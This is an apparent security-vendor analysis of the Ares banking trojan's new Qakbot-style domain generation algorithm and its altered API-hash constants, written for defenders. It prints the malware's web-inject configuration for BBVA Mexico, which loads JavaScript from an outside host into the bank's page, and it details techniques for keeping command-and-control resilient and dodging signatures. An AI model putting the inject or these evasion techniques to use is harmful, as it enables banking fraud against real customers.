The Ares Banking Trojan Learns Old Tricks: Adds the Defunct Qakbot DGA

Summary: ThreatLabz observed an update to the Ares banking trojan that introduces a domain generation algorithm (DGA), which mirrors the Qakbot DGA. Based on analyzing the malware code, there does not appear to be a direct link between these two malware families. The Ares DGA may be an effort for the threat actor to maximize the lifetime of an infection, which provides more opportunities for monetizing compromised systems through attacks such as wire fraud and ransomware.

 

Key Points

• The Ares banking trojan received new updates in August 2022 including a domain generation algorithm (DGA) that is used as a fallback in the event the primary command-and-control (C2) communication channel is unreachable.
• The domain generation algorithm implementation is virtually identical to the Qakbot banking trojan’s defunct DGA algorithm.
• The DGA algorithm is based on a hardcoded seed and the current date. The algorithm generates 50 domains per interval (150 domains per month) and uses the daytime protocol to obtain the date.
• Based on reverse engineering Ares, the DGA appears to be a reimplementation of Qakbot’s algorithm rather than sharing the same codebase.
• The Ares banking trojan is currently being used to target financial institutions in Mexico.

Zscaler ThreatLabz has been tracking developments to the Ares banking trojan, which emerged in February 2021. Ares is based on the Osiris malware family, which in turn, was forked from the original Kronos banking trojan. Threat actors that utilize Ares had been inactive from approximately March 2022 to June 2022. However, there is a new version of Ares that was released in August 2022 that adds new features. These new Ares samples were compiled on August 15, 2022 and implement a domain generation algorithm. The introduction of a DGA is not by itself novel. However, the DGA algorithm is particularly interesting because it is nearly identical to the DGA that was implemented by the Qakbot banking trojan.

 

Technical Analysis

Ares samples contain one or more hardcoded URLs that are used as the primary C2 channel. In new versions of Ares, the malware will make up to 50 attempts to contact the primary C2 servers. If these C2 channels are unreachable, Ares will generate domains using a DGA. An example code comparison between the Ares DGA and Qakbot DGA is shown in Figure 1.

 

Figure 1. Code comparison between the DGAs of Ares (left) and Qakbot (right)

 

The primary differences between the Ares DGA and the Qakbot DGA are the former generates 50 domains per interval while the old Qakbot algorithm generated 5,000 domains. In addition, Ares uses the daytime protocol via TCP port 13 to retrieve the current day from one of the following servers:

• time-a.nist.gov
• time-a-g.nist.gov
• time.nist.gov

Ares will try each NIST daytime server up to three times. The response from the NIST server is similar to the following:

59820 22-08-29 23:18:13 50 0 0 593.0 UTC(NIST) * 

In contrast, the Qakbot DGA obtained the current date from public web servers including google.com, cnn.com, and microsoft.com. Similar to Qakbot, Ares converts the response from the daytime server to a string with the format Date: %a, %d %b %Y 00:00:00 GMT. An example string in this format is Date: Mon, 29 Aug 2022 00:00:00 GMT.

From this point forward, the algorithm is identical to Qakbot. The date string is converted to the format %u.%s.%s.%08x. The first parameter is an integer in the range between 0 and 2 (depending on the day of the month), followed by the abbreviated month converted to lowercase, followed by the year and a hardcoded constant. In the Ares samples analyzed by ThreatLabz, the magic constant was 0x9283920. Conversely, Qakbot typically hardcoded this magic value to 0 or 1. An example string in this format is 2.aug.2022.09283920. This string is then passed to a CRC32 hash function to produce an integer value that is used as a seed to a Mersenne Twister pseudo random number generator. The Mersenne Twister generates random integers that are used as an index to choose a sequence of lowercase alphabetic characters. The algorithm will produce a domain that is between 8 and 25 characters in length appended with a hardcoded top-level domain (TLD). The TLD is chosen by splitting the string com;net;org;info;biz;org (note the double use of the .org TLD) into an array and using the Mersenne Twister PRNG to choose an integer value as an index into the array. The algorithm splits the set of 50 domains into three time intervals. The first two intervals have a validity of 10 days, while the domains in the last interval are valid from 8 to 11 days depending on the number of days in the month. Therefore, Ares will generated 150 potential C2 domains per month. Example domains generated for August 29, 2022 by Ares are shown below in Table 1.
 

 

Table 1. Ares DGA domains for August 29, 2022

At the time of publication, none of these domains currently resolve.

Analysis of the Ares code indicates that the algorithm was likely reimplemented rather than having access to the Qakbot DGA source code. In fact, there is an open source C implementation of the Qakbot algorithm that is likely the origin of the Ares implementation. In comparison, this open source implementation uses non-native Windows API functions for string operations (e.g., strcat, strlen, atoi, etc), which is identical to Ares. On the other hand, Qakbot uses Windows APIs including lstrcatA and lstrlenA.

ThreatLabz has modified a Python-based implementation of the Qakbot DGA authored by Johannes Bader to generate the Ares DGA domains. The Ares DGA tool is located in our GitHub repository here.

 

Web Inject Configuration

The Ares malware author appears to be testing web injects to insert HTML content and JavaScript into a targeted website. While the Ares C2 server is not currently serving a dynamic web inject configuration, recent samples contain the following hardcoded configuration targeting BBVA Mexico as shown below:

 

set_url http*bbva*.mx* GP
data_before
<body*>
data_end
data_inject
<div id="botid" style="display:none;">%BOTID%</div>
<script type="text/javascript" src="https://www.trendybaby.co[.]uk/assets/css/homeats.js"></script>
data_end

 

Dynamic API Hash Algorithm

The Ares malware author has altered the original Kronos source code to create new Windows API hash values for dynamically resolving NTDLL functions. The modification to the CRC64 algorithm is very slight, but sufficient to bypass static signatures that search for the previous Kronos hash values. In particular, the CRC64 polynomial (0xD800000000000000) was modified by setting the lower DWORD value from 0x00 to 0x10 as shown in Figure 2.

 

Figure 2. Ares import hashing algorithm with a modification to the standard CRC64 polynomial

As an example, the standard CRC64 hash value for the string sprintf is 5FE79276722143D0, while in the latest Ares variant, the CRC64 hash value is DC1FC2878FEE79C0. Ares then utilizes the Kronos algorithm to map these values to alphanumeric characters. ThreatLabz has implemented a Python script (available in our GitHub repository) that can be used to generate these hash values. The full list of NTDLL API function names used by Ares and the corresponding hash values is located in the Appendix.

 

Conclusion

The developer of Ares continues to add new features to the malware to make it more resilient to detection and disruption. The implementation of Qakbot's DGA will allow a threat actor using Ares to easily deploy new C2 servers and regain control of infected systems if the primary servers are taken down. This is likely an indicator that further attacks are soon to follow.

 

 

Cloud Sandbox Detection

In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to the campaign at various levels with the following threat names:

Win32.Banker.Kronos

Win32.Banker.Kronos.LZ

 

Indicators of Compromise (IOC)

 

 

The domains generated by the Ares DGA for August 1, 2022 to December 31, 2022 are available here.

 

Ares Hash Values